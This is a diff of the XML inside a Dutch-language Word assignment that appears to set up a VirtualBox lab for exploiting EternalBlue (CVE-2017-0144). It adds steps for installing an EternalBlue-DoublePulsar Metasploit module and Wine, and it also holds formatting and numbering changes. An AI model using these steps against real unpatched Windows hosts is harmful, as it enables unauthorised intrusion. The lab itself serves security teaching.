+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cp EternalBlue/Eternalblue-Doublepulsar-Metasploit/eternalblue-doublepulsar.rb /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/share/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-framework/modules/exploits/windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Install Wine</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> apt-get install wine -y</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Run wine to make required directories</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>winecfg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">close </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>wine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>window</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
           <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
@@ -4272,7 +4705,6 @@
         <w:t xml:space="preserve"> $</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="18"/>
@@ -4282,7 +4714,6 @@
         <w:t>NATNetworkName</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4592,18 +5023,8 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> on --ipv6 off --</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>enable</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> on --ipv6 off --enable</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4729,7 +5150,6 @@
         <w:t xml:space="preserve"> $</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="18"/>
@@ -4739,7 +5159,6 @@
         <w:t>NATNetworkName</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4807,18 +5226,8 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"># 2. Create Kali VM for attack | +- </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>2min</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t># 2. Create Kali VM for attack | +- 2min</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5102,18 +5511,8 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>bidirectional</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop bidirectional</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5745,18 +6144,8 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"># 3. Create Windows VM for vulnerability) | +- </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>15min</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t># 3. Create Windows VM for vulnerability) | +- 15min</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6040,18 +6429,8 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>bidirectional</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop bidirectional</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6854,6 +7233,98 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="20824C6B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="C4A2EBEE"/>
+    <w:lvl w:ilvl="0" w:tplc="0C000001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="FFFFFFFF">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="FFFFFFFF" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2622297E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1BB69D98"/>
@@ -6942,7 +7413,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="390775D3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0576FC6C"/>
@@ -7028,7 +7499,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="40077BF7"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2690CBD6"/>
+    <w:lvl w:ilvl="0" w:tplc="0C000001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48063F71"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="180CE782"/>
@@ -7141,7 +7725,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="50B33C1D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EA96158C"/>
@@ -7254,7 +7838,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5D4E4F25"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2892C908"/>
@@ -7367,7 +7951,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7E671192"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="5E76631A"/>
@@ -7481,7 +8065,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1917982506">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="707412596">
     <w:abstractNumId w:val="0"/>
@@ -7490,22 +8074,28 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1507086936">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1858229270">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="996225369">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="793252089">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="490289038">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="525412722">
     <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="8" w16cid:durableId="490289038">
-    <w:abstractNumId w:val="8"/>
+  <w:num w:numId="10" w16cid:durableId="1463882444">
+    <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="9" w16cid:durableId="525412722">
-    <w:abstractNumId w:val="5"/>
+  <w:num w:numId="11" w16cid:durableId="1460800087">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>

--- a/Opdracht/OpdrachtNPE.docx
+++ b/Opdracht/OpdrachtNPE.docx
@@ -4,22 +4,26 @@
   <w:body>
     <w:sdt>
       <w:sdtPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
         <w:id w:val="230423291"/>
         <w:docPartObj>
           <w:docPartGallery w:val="Cover Pages"/>
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
-      <w:sdtEndPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:sdtEndPr>
       <w:sdtContent>
         <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:lang w:val="nl-BE"/>
+            </w:rPr>
+          </w:pPr>
           <w:r>
             <w:rPr>
               <w:noProof/>
+              <w:lang w:val="nl-BE"/>
             </w:rPr>
             <mc:AlternateContent>
               <mc:Choice Requires="wpg">
@@ -288,6 +292,7 @@
           <w:r>
             <w:rPr>
               <w:noProof/>
+              <w:lang w:val="nl-BE"/>
             </w:rPr>
             <mc:AlternateContent>
               <mc:Choice Requires="wps">
@@ -494,6 +499,7 @@
           <w:r>
             <w:rPr>
               <w:noProof/>
+              <w:lang w:val="nl-BE"/>
             </w:rPr>
             <mc:AlternateContent>
               <mc:Choice Requires="wps">
@@ -783,12 +789,12 @@
               <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
               <w:sz w:val="32"/>
               <w:szCs w:val="32"/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:val="nl-BE"/>
             </w:rPr>
           </w:pPr>
           <w:r>
             <w:rPr>
-              <w:lang w:val="en-US"/>
+              <w:lang w:val="nl-BE"/>
             </w:rPr>
             <w:br w:type="page"/>
           </w:r>
@@ -895,19 +901,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t>CVE-2017-0144</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, ook wel gekend onder de naam </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Microsoft SMBv1 Remote Code </w:t>
+        <w:t xml:space="preserve">CVE-2017-0144, ook wel gekend onder de naam Microsoft SMBv1 Remote Code </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1050,13 +1044,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve">In plaats van Microsoft </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">in te lichten </w:t>
+        <w:t xml:space="preserve">In plaats van Microsoft in te lichten </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1861,30 +1849,30 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:color w:val="auto"/>
           <w:u w:val="none"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Windows</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> 7</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -1894,7 +1882,7 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:sz w:val="20"/>
             <w:szCs w:val="20"/>
-            <w:lang w:val="en-US"/>
+            <w:lang w:val="nl-BE"/>
           </w:rPr>
           <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=tDblwD</w:t>
         </w:r>
@@ -1905,7 +1893,7 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:ind w:left="1440"/>
         <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1913,7 +1901,7 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>REBUILD LINKS, FILES CHANGED</w:t>
       </w:r>
@@ -2268,16 +2256,18 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>Exploit</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2287,24 +2277,26 @@
           <w:numId w:val="4"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve">Start </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Metasploit</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
@@ -2319,15 +2311,15 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>msfconsole</w:t>
       </w:r>
@@ -2412,20 +2404,28 @@
           <w:numId w:val="4"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve">Scan </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>vulnerability.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2439,25 +2439,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve">De scanner die </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>h</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>ierna g</w:t>
